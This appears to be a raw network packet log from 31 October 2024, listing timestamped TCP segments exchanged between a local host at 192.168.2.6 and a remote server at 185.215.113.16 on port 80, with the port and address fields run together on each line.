                                                                            Oct 31, 2024 20:49:18.200095892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.200148106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.200227976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.240061998 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.253552914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.253565073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.253581047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.253736019 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.254002094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.254043102 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.254066944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.254079103 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.254172087 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.254292011 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.302561998 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.317519903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.317609072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.317658901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.317670107 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.317733049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.317769051 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.317784071 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.365101099 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.366211891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.366231918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.366316080 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.372601986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.372648001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.372659922 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.372755051 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.372837067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.372889042 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.372903109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.372920036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.372958899 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.373023987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.427661896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.436244011 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.436289072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.436301947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.436419010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.436419010 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.436430931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.436474085 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.491489887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.491559029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.491570950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.491667986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.491676092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.491729021 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.491797924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.491805077 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.491890907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.491893053 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.491903067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.492003918 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.492027044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.536995888 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.555020094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.555047989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.555061102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.555144072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.555146933 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.555187941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.555203915 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.555217981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.555701971 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.610378981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610483885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610538960 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610551119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.610552073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610603094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.610687971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610734940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610847950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610861063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610873938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.610929012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.610929012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.673607111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.673676014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.673686981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.673774958 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.673903942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.673944950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.673957109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.673975945 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.673995972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.713975906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.714020014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.714081049 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.729827881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.729860067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.729871035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.729923010 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.730000019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.730010986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.730022907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.730073929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.730073929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.730237007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.730249882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.730259895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.730319977 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.771325111 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.793147087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.793220997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.793232918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.793268919 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.793303967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.793315887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.793370008 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.849085093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.849215984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.849268913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.849268913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.849281073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.849385977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:18.849399090 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:18.896357059 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.001277924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001307011 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001319885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001406908 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.001420975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001435041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001480103 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.001568079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001580954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001591921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001630068 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.001701117 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.001832962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001844883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001862049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001873970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.001898050 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.001923084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.002104044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.002121925 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.002134085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.002146959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.002170086 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.002206087 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.002506971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.002657890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.002671003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.002757072 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.030603886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.030616999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.030698061 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.032310963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.032387018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.032397985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.032413006 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.032453060 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.087006092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.087074995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.087085009 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.087166071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.087176085 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.087178946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.087191105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.087223053 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.087243080 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.087781906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.088198900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.088301897 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.119450092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.119491100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.119556904 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.302159071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.302232981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.302244902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.302299023 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.302398920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.302411079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.302489996 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.357983112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358022928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358036041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358103037 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.358169079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358181000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358192921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358206034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358238935 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.358259916 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.358409882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358462095 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.358514071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358525991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358634949 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358635902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.358724117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358779907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358792067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.358932972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.358932972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.389600992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.389627934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.389640093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.389699936 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.434303999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.434370041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.434463024 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.447366953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.447402000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.447475910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.707916975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.708009958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.708020926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.708089113 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.708101034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.708111048 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.708159924 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.709139109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.709150076 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.709161043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.709172010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.709182978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.709193945 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.709193945 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.709220886 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.709662914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.709743023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.709758997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.709820986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.709820986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.709940910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710010052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710020065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710033894 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710057020 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.710094929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.710335016 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710349083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710361004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710422993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.710582018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710592985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.710628986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.714920998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.714988947 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.715066910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.715079069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.715095997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.715164900 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.715164900 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.717288971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.717319012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.717329979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.717432976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.717469931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.717482090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.717572927 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.746088028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.746165991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.746176004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.746213913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.746232986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.787058115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.801240921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.801387072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.801400900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.801460981 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.833976984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.834033012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.834044933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.834100008 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.834153891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.834233999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.834244013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.834368944 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.864995956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.865086079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.865097046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.865134001 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.865171909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.920444965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.920478106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.920490980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.920561075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.953155994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.953197002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.953208923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.953301907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.953301907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.953341007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.953352928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.953396082 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:19.994083881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.994097948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.994110107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:19.994143963 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.037079096 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.040757895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.040775061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.040787935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.040873051 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.083846092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.223777056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.223830938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.223854065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.223912954 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.223929882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.223941088 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.223973989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.224087954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.224100113 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.224111080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.224172115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.224343061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.224354029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.224365950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.224376917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.224419117 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.224463940 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.224715948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.271337032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.342310905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342328072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342339039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342443943 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342545986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342550993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.342550993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.342559099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342570066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342582941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342602968 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.342634916 CET4974980192.168.2.6185.215.113.16
